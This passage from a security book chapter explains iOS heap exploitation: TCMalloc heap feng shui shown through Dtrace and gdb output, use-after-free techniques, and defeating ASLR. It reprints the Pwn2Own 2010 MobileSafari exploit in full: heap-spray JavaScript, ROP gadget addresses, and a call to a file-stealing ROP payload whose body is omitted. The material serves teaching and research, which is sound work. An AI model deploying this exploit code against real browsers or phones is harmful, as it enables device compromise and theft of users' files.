              WebCore`_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS_8DocumentE+0x1b
              WebCore`_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS_8DocumentE+0x1b
              WebCore`_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS_8DocumentE+0x1b
              WebCore`_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS_8DocumentE+0x1b
              WebCore`_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS_8DocumentE+0x1b
snaggs-MacBook-Air:~ snagg$ cat out2 | grep HTMLDiv | wc -l
      10

You have the 10 vulnerable objects in the Dtrace output. By attaching to the process with gdb you can verify that the div objects are allocated between strings. Arbitrarily picking one of the 10 vulnerable objects from the Dtrace output, you have:

2   8717    _ZN3WTF10fastMallocEm:return Pointer 0x2e5ec00

              JavaScriptCore`_ZN3WTF10fastMallocEm+0x1b2
              WebCore`_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS_8DocumentE+0x1b

Now you can inspect the memory with gdb:

(gdb) x/40x 0x2e5ec00
0x2e5ec00:     0xad0d2228     0xad0d24cc     0x00000001     0x00000000
0x2e5ec10:     0x6d2e8654     0x02f9cb00     0x00000000     0x00000000
0x2e5ec20:     0x00000000     0x0058003c     0x00000000     0x00000000
0x2e5ec30:     0x00306ed0     0x00000000     0x00000000     0x00000000
0x2e5ec40:     0x02e5e480     0x00000014     0x02e5ec54     0x00000000
0x2e5ec50:     0x00000000     0x81818181     0x81818181     0x81818181
0x2e5ec60:     0x81818181     0x81818181     0x81818181     0x81818181
0x2e5ec70:     0x81818181     0x81818181     0x81818181     0x00000010
0x2e5ec80:     0x00000000     0x00000030     0x00000043     0x00000057
0x2e5ec90:     0x00000000     0x81818181     0x81818181     0x81818181
(gdb) x/40x 0x2e5ec00 - 0x40
0x2e5ebc0:     0x02e5ed00     0x00000014     0x02e5ebd4     0x00000000
0x2e5ebd0:     0x00000000     0x81818181     0x81818181     0x81818181
0x2e5ebe0:     0x81818181     0x81818181     0x81818181     0x81818181
0x2e5ebf0:     0x81818181     0x81818181     0x81818181     0x82828282
0x2e5ec00:     0xad0d2228     0xad0d24cc     0x00000001     0x00000000
0x2e5ec10:     0x6d2e8654     0x02f9cb00     0x00000000     0x00000000
0x2e5ec20:     0x00000000     0x0058003c     0x00000000     0x00000000
0x2e5ec30:     0x00306ed0     0x00000000     0x00000000     0x00000000
0x2e5ec40:     0x02e5e480     0x00000014     0x02e5ec54     0x00000000
0x2e5ec50:     0x00000000     0x81818181     0x81818181     0x81818181
(gdb)

It is clear that the div object sits between two strings with your own content (0x8181), one before it and one after it.

The importance of being able to overwrite application-specific data in TCMalloc lies in the fact that, similar to what is done for objects in the large region in magazine malloc, the heap metadata is stored separately from each heap block. Therefore, overflowing a TCMalloc'd buffer will not overwrite heap metadata, but rather the buffer allocated after it. Thus, it is not possible to take advantage of the typical old heap exploitation techniques used to obtain code execution.

Exploiting Object Lifetime Issues with TCMalloc

When it comes to object lifetime issues, it is not strictly necessary to have the vulnerable object in between two objects over which you have control. It is more important to ensure that you are able to replace the object with good reliability. In this scenario, the first step of the attack is to allocate one or more vulnerable objects. Afterwards, the action that triggers the release of the object needs to be performed. The next step is to allocate enough objects of the same size as the vulnerable object to make sure that a garbage collection occurs, and at the same time that the vulnerable object is replaced with an object of your choice. At this point the only step left is to trigger a “use” condition to obtain code execution.

It is important to note that the same procedure used for arithmetic vulnerabilities can be used for object lifetime issues as well. However, in that case you must pay particular attention to the size of the objects you use and the number of objects you allocate. In fact, the first time you defragment the heap, a garbage collection occurs; therefore, to trigger the garbage collector another time after the object is freed, a higher number of objects is required.

The same problem occurs when you free the objects in between the ones you control; to make sure that the vulnerable object is placed in a hole, another garbage collection must be triggered. Given the structure of TCMalloc, it is clear that the ideal way of triggering the garbage collector to exploit the vulnerability is to use objects of a different size than the vulnerable one. In fact, by doing so the freelist for the vulnerable object will not change much and you avoid jeopardizing the success of your exploit.

ASLR Challenges

Before iOS 4.3, it was possible to develop a Return Oriented Programming (ROP) payload and an exploit for iOS without worrying too much about Address Space Layout Randomization (ASLR). In fact, although there was still some guesswork involved in understanding where attacker-controlled data would be placed in the process address space, there were no problems in terms of ROP payload development because the libraries, the main binary, and the dynamic linker were all placed at predictable addresses.

Starting with iOS 4.3, Apple introduced full address space layout randomization on the iPhone.

ASLR on iOS randomizes the libraries, which are stored together in dyld_shared_cache, as well as the dynamic linker, the heap, and the stack. If the application supports position-independent code, the main executable is randomized as well.

This poses numerous problems for attackers, mainly for two reasons. The first is that a ROP payload can no longer rely on hardcoded addresses, and the second is the guesswork involved in finding the address where attacker-controlled data might be placed.

There is no one-size-fits-all way to defeat ASLR. Quite the contrary — every exploit has its own peculiarities that might provide a way to leak addresses useful to an attacker.

A good example of ASLR defeat through repurposing an overflow is the Saffron exploit by comex. In that exploit, a missing check on an argument counter allowed an attacker to read from and write to the following structure:

  typedef struct  T1_DecoderRec_
  {
    T1_BuilderRec        builder;

    FT_Long              stack[T1_MAX_CHARSTRINGS_OPERANDS];
    FT_Long*             top;

    T1_Decoder_ZoneRec   zones[T1_MAX_SUBRS_CALLS + 1];
    T1_Decoder_Zone      zone;

    FT_Service_PsCMaps   psnames;      /* for seac */
    FT_UInt              num_glyphs;
    FT_Byte**            glyph_names;

    FT_Int               lenIV;        /* internal for sub routine calls */
    FT_UInt              num_subrs;
    FT_Byte**            subrs;
    FT_PtrDist*          subrs_len;    /* array of subrs length (optional) */

    FT_Matrix            font_matrix;
    FT_Vector            font_offset;

    FT_Int               flex_state;
    FT_Int               num_flex_vectors;
    FT_Vector            flex_vectors[7];

    PS_Blend             blend;       /* for multiple master support */

    FT_Render_Mode       hint_mode;

    T1_Decoder_Callback  parse_callback;
    T1_Decoder_FuncsRec  funcs;

    FT_Long*             buildchar;
    FT_UInt              len_buildchar;

    FT_Bool              seac;

  } T1_DecoderRec;

The attacker then read a number of pointers, including parse_callback, and stored in the buildchar member a ROP payload constructed with the knowledge obtained from the out-of-bounds read. Finally, the attacker overwrote the parse_callback member and triggered a call to it. At that point, the ASLR-defeating ROP payload was executed.
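The way a leaked pointer turns into usable gadget addresses can be sketched generically. This is not the Saffron code: every address below is hypothetical, and the sketch assumes that the leaked function pointer and the gadgets live in the same randomized image, so that a single slide applies to all of them.

```javascript
// Difference between where a known function was found at run time and
// where it sits in the unrandomized image.
function computeSlide(leakedPointer, unslidPointer) {
  return (leakedPointer - unslidPointer) >>> 0;
}

// Apply the slide to a list of gadget addresses taken from the static image.
function rebase(unslidAddresses, slide) {
  return unslidAddresses.map((address) => (address + slide) >>> 0);
}

// Hypothetical values for illustration only.
const unslidCallback = 0x30001000; // address of the callback in the static image
const leakedCallback = 0x30a41000; // value read out of the structure at run time
const unslidGadgets = [0x30002345, 0x3000abcd];

const slide = computeSlide(leakedCallback, unslidCallback);
const gadgets = rebase(unslidGadgets, slide);

console.log("slide: 0x" + slide.toString(16));
console.log(gadgets.map((g) => "0x" + g.toString(16)));
```

Once the slide is known, the payload can be assembled at run time instead of being hardcoded, which is what distinguishes an ASLR-aware exploit from the pre-4.3 ones.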

In general, the burden of defeating ASLR and the lack of generic methods to do so greatly increase the development effort that an attacker has to put into each exploit. More importantly, while in the past it was possible to get away with guesswork because libraries were not randomized, and therefore constructing a payload was not a problem, from 4.3 on, an exploit must defeat ASLR to be successful.

The next section analyzes an exploit for MobileSafari that did not need to bypass ASLR.

Case Study: Pwn2Own 2010

This case study presents the Pwn2Own exploit used in 2010. For the scope of this chapter we have taken out the payload that was used because ROP concepts are properly explained and commented in a different chapter of the book.

The function pwn() is responsible for bootstrapping the exploit. The first thing that is done in there is to generate a JavaScript function that creates an array of strings. The strings are created using the fromCharCode() function, which guarantees that you create a string of the correct size (see the example on heap feng shui in the paragraph describing exploitation techniques against TCMalloc for more details on the string implementation in WebKit). The first two parameters of the generator are the length of each string, which matches the size of the object that needs to be replaced (20 UChars, that is, 40 bytes), and the number of strings to allocate (4000 in this case). The rest of the parameters specify the content of the string. It will be filled with some exploit-specific data and the rest of it will be filled with an arbitrary value (0xCCCC).

The vulnerability itself is caused by attribute objects that were not properly deleted from the Node cache when the attributes were deallocated. The rest of the pwn() function takes care of allocating a number of attribute objects and removing them right after the allocation.

At this point the exploit triggers the garbage collector by calling the nodeSpray() function, which is the function generated at the beginning by genNodeSpray(). In addition to triggering the garbage collector, and thus making sure that the attributes are released by the allocator, it also replaces them with strings of the correct size.

The last step is to spray the heap with the shellcode that needs to be executed and trigger a call to a virtual function (focus() in this case). This way the first four bytes of the string that is used to replace the object act as a virtual table pointer and divert the execution to a location the attacker controls.

<html>
<body onload="pwn()">
<script>

function genNodeSpray3GS (len, count, addy1, addy2, ret1, ret2, c,
objname) {
      var evalstr = "function nodeSpray() { for(var i = 0; i < " + count + "; i++) { ";

      evalstr += objname + "[i]" + " = String.fromCharCode(";
     
      var slide = 0x1c;
     
      for (var i = 0; i < len; i++) {
            if (i == 0 ) {
                  evalstr += addy1;
            } else if (i == 1 || i == 17) {
                  evalstr += addy2;
            } else if (i == 16) {
                  // UChars 16 and 17 sit at byte offset 32, which the gadget loads into r7
                  evalstr += addy1 + slide;
            }else if(i == 18) {
                  evalstr +=ret2;
            }else if(i == 19) {
                  evalstr += ret1;
            } else if (i > 1 && i< 4) {
                  evalstr += c;
            } else {
                  evalstr += 0;
            }
            if (i != len-1) {
                  evalstr += ",";
            }
      }
      evalstr += "); }}";

      return evalstr;
}

function genNodeSpray (len, count, addy1, addy2, c, objname) {
      var evalstr = "function nodeSpray() { for (var i = 0; i < " + count + "; i++) { ";

      evalstr += objname + "[i]" + " = String.fromCharCode(";
     
      for (var i = 0; i < len; i++) {
            if (i == 0) {
                  evalstr += addy1;
            } else if (i == 1) {
                  evalstr += addy2;
            } else if (i > 1 && i< 4) {
                  evalstr += c;
            } else {
                  evalstr += 0;
            }
            if (i != len-1) {
                  evalstr += ",";
            }
      }
      evalstr += "); }}";

      return evalstr;
}

function pwn()
{
      var obj = new Array(4000);
      var attrs = new Array(100);

      // Safari 4.0.5 (64 bit, both DEBUG & RELEASE) 74 bytes -> 37 UChars
      // Safari 4.0.5 (32 bit, both DEBUG & RELEASE) 40 bytes -> 20 UChars
      // MobileSafari/iPhone 3.1.3 40 bytes -> 20 UChars
      // 0x4a1c000 --> 0 open pages
      // 0x4d00000 --> 1 open page
     
      // 3g 0x5000000
      //eval(genNodeSpray(20, 8000, 0x0000, 0x0500, 52428, "obj"));

      eval(genNodeSpray3GS(20, 4000, 0x0000, 0x0600, 0x328c, 0x23ef, 52428, "obj"));
     
      // iOS 3.1.3 (2G/3G):
      // gadget to gain control of SP, located at 0x33b4dc92 (libSystem)
      //
      // 33b4dc92            469d        mov     sp, r3
      // 33b4dc94            bc1c        pop     {r2, r3, r4}
      // 33b4dc96            4690        mov     r8, r2
      // 33b4dc98            469a        mov     sl, r3
      // 33b4dc9a            46a3        mov     fp, r4
      // 33b4dc9c            bdf0        pop     {r4, r5, r6, r7, pc}
      //
      // note that we need to use jumpaddr+1 to enter thumb mode
      // [for iOS 3.0 (2G/3G) use gadget at 0x31d8e6b4]
      //
      //
      // iOS 3.1.3 3GS:
      //
      // gadget to gain control of SP; a bit more involved because we can't mov r3 into sp,
      // so we do it in two stages:
      //
      // 3298d162            6a07        ldr     r7, [r0, #32]
      // 3298d164        f8d0d028        ldr.w   sp, [r0, #40]
      // 3298d168            6a40        ldr     r0, [r0, #36]
      // 3298d16a            4700        bx      r0
      //
      // r0 is a pointer to the crafted node. We point r7 to our crafted stack,
      // and r0 to 0x328c23ee.
      // the stack pointer points to something we don't control as the node is
      // 40 bytes long.
      //
      // 328c23ee        f1a70d00        sub.w   sp, r7, #0      ; 0x0
      // 328c23f2            bd80        pop     {r7, pc}
      //
     
      //3GS
      var trampoline = "123456789012" + encode_uint32(0x3298d163);
      //var ropshellcode = vibrate_rop_3_1_3_gs();
     
      //we have to skip the first 28 bytes
      var ropshellcode = stealFile_rop_3_1_3_gs(0x600001c);
     
      //3G
      //var trampoline = "123456789012" + encode_uint32(0x33b4dc93);
      //var ropshellcode = vibrate_rop_3_1_3_g();
     
      for(var i = 0; i < attrs.length; i++) {
            attrs[i] = document.createAttribute('PWN');
            attrs[i].nodeValue = 0;
      }

      // dangling pointers are us.
      for(var i = 0; i < attrs.length; i++) {
            // bug trigger (used repeatedly to increase reliability)
            attrs[i].removeChild(attrs[i].childNodes[0]);
      }

      nodeSpray();

      // no pages open: we can spray 10000 strings w/o SIGKILL
      // 1 page open: we can only spray 8000 strings w/o SIGKILL
      var retaddrs = new Array(20000);
     
      for(var i = 0; i < retaddrs.length; i++) {
            retaddrs[i] = trampoline + ropshellcode;
      }

      // use after free on WebCore::Node object
      // overwritten vtable pointer gives us control over PC
      attrs[50].childNodes[0].focus();
}
</script>
</body>
</html>
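
The comments in the listing state that the 3GS gadget loads r7 from offset 32 and r0 from offset 36 of the 40-byte crafted node, and that the crafted stack is expected at 0x600001c. Because each character passed to String.fromCharCode occupies two bytes, it can help to check by hand how pairs of 16-bit values combine into those 32-bit little-endian words. The following is a minimal sketch of that arithmetic only; the helper name wordAt and the node array are assumptions introduced for illustration and are not part of the original exploit.

```javascript
// Hypothetical helper (not in the original listing): returns the
// little-endian 32-bit word that starts at a given byte offset of a
// buffer made of 16-bit UChars.
function wordAt(uchars, byteOffset) {
  var lo = uchars[byteOffset / 2];      // low half-word is stored first
  var hi = uchars[byteOffset / 2 + 1];  // high half-word follows it
  return ((hi << 16) | lo) >>> 0;       // >>> 0 keeps the result unsigned
}

// 20 UChars = 40 bytes, the node size given in the listing's comments.
var node = [];
for (var i = 0; i < 20; i++) {
  node.push(0);
}
node[16] = 0x0000 + 0x1c; // addy1 + slide
node[17] = 0x0600;        // addy2
node[18] = 0x23ef;        // ret2
node[19] = 0x328c;        // ret1

console.log(wordAt(node, 32).toString(16)); // prints "600001c"
console.log(wordAt(node, 36).toString(16)); // prints "328c23ef"
```

The word at offset 36 is odd because, as the listing notes, the jump address needs its low bit set to enter Thumb mode.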

Testing Infrastructure

Choosing the most appropriate testing infrastructure for developing an exploit presents a number of difficulties.

You have a number of factors to consider when testing an exploit. First, the application version used for testing needs to be the same as, or as close as possible to, the one the exploit is supposed to work on. Second, the allocator on the testing platform needs to behave as closely as possible to the one on the real target. Finally, there must be an easy way to test the exploit multiple times.
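
The last requirement, repeatable testing, can be sketched as a small harness that runs a trial many times and reports how often it succeeds. This is only an illustration under stated assumptions: measureReliability and the stand-in trial function are hypothetical names, and in practice the trial would wrap whatever launches and checks a single test run in your environment.

```javascript
// Hypothetical harness: `trial` is any function that returns true when a
// single test run succeeds. A thrown exception counts as a failure.
function measureReliability(trial, runs) {
  var successes = 0;
  for (var i = 0; i < runs; i++) {
    try {
      if (trial(i) === true) {
        successes++;
      }
    } catch (e) {
      // Treat a crash in the trial as a failed run and keep going.
    }
  }
  return {
    runs: runs,
    successes: successes,
    rate: runs > 0 ? successes / runs : 0
  };
}

// Usage with a stand-in trial that fails on every fourth run.
var report = measureReliability(function (i) {
  return i % 4 !== 3;
}, 100);
console.log(report.successes + "/" + report.runs + " runs succeeded");
// prints "75/100 runs succeeded"
```

Tracking a success rate rather than a single pass or fail makes it easier to see whether a change to the heap layout strategy actually improves reliability.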

In general, while developing, it is always a good idea to have tools like diff for source code or BinDiff for binaries that allow you to explore the differences between the real system and the testing one.

As with the processes you've seen in the course of this chapter, where most of the tests were conducted on Mac OS X, it is often possible to start development on a virtual machine or a computer running Mac OS X. By diffing either the source code or the binary, you can identify the characteristics common to the testing environment and the deployment environment.
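
One lightweight way to keep track of what the two environments share is to record their characteristics side by side and compare them. The sketch below assumes hypothetical descriptor objects; the field names and values are illustrative only and would normally come from your own diffing of the source code or binaries.

```javascript
// Hypothetical comparison of two environment descriptors. Returns the
// property names whose values match and those whose values differ.
function compareEnvironments(testEnv, targetEnv) {
  var common = [];
  var different = [];
  var seen = Object.create(null); // avoids clashes with inherited names
  var keys = Object.keys(testEnv).concat(Object.keys(targetEnv));
  keys.forEach(function (key) {
    if (seen[key]) {
      return;
    }
    seen[key] = true;
    if (testEnv[key] === targetEnv[key]) {
      common.push(key);
    } else {
      different.push(key);
    }
  });
  return { common: common, different: different };
}

// Illustrative values only.
var testEnv = { os: "Mac OS X", arch: "32-bit x86", browserAllocator: "TCMalloc" };
var targetEnv = { os: "iOS", arch: "ARM", browserAllocator: "TCMalloc" };

var result = compareEnvironments(testEnv, targetEnv);
console.log("common:", result.common.join(", "));       // prints "common: browserAllocator"
console.log("different:", result.different.join(", ")); // prints "different: os, arch"
```

Anything that lands in the "different" list is a candidate for a porting problem later on.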

Usually, you can use two strategies to test an exploit. The first one starts by developing it for 32-bit Mac OS X (in a virtual machine if you are dealing with the system heap), then porting it to a jailbroken iPhone, and finally testing it on a non-jailbroken one. This method lets you get around the problem of not having a debugger available on a non-jailbroken iPhone.

The second strategy is applicable only if the vulnerability can be reproduced in a test program. That is, it is possible to include the vulnerable library or framework in a test application to be deployed on a developer iPhone and mimic the triggering conditions from the test application. This strategy is rarely applicable, but when it is, it allows you to debug the exploit directly on the phone by using the Xcode debugging capabilities for iPhone applications.

Finally, it is vital not to make any assumptions about the capabilities of the exploit in the test environment. Applications on the iPhone are sandboxed in a fashion that might differ from Mac OS X. Moreover, jailbreaking an iPhone severely changes the underlying security infrastructure of the phone, so it is always better to test the payload intended to run with the exploit separately.

In Chapter 8 you see a few ideas on how to perform such testing.

Summary

This chapter explored the inner mechanisms of the two most used allocators on iOS. It used Mac OS X as a testing platform to do most of the grunt work involved in exploitation.

A number of techniques to control both TCMalloc and the system heap were explained. Specifically, this chapter strove to divide techniques based on the kinds of vulnerabilities for which they are the most suitable. You saw what challenges exploitation on newer versions of the iPhone firmware creates, specifically the problem of creating a reliable and portable exploit due to ASLR.

Finally, you saw a real-life example of a MobileSafari exploit targeting iOS 3.1.3, and learned strategies to precisely test an exploit without incurring porting problems and wrong assumptions.
